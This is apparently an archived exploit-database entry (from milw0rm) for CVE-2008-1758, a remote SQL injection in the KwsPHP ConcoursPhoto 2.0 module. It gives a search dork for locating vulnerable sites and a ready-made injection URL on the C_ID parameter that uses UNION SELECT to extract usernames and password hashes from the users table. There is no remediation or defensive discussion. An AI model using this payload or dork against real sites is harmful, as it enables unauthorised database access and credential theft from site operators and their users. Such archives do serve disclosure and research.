KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' SQL Injection
Author: Stack
type: webapps
platform: php
port:
date_added: 2008-04-02
date_updated: 2016-11-17
verified: 1
codes: OSVDB-44336;CVE-2008-1758
tags:
aliases:
screenshot_url:
application_url:
#########################################################################
KwsPHP Module ConcoursPhoto Remote SQL Injection Exploit
#########################################################################
## AUTHOR : Stack-Terrorist [v40]
## Email : admin@v4-team.com
## Home : http://v4-team.com & http://stack-terrorist.com
## Script : KwsPHP Module ConcoursPhoto
## Bug : Remote SQL Injection Exploit
## Dork : inurl:index.php?mod=ConcoursPhoto
## EXPLOITS :
http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*
## GREETZ : All muslims Hackers
## speacial thnx to : str0ke
#########################################################################
Stack-Terrorist [v40]
#########################################################################
# milw0rm.com [2008-04-03]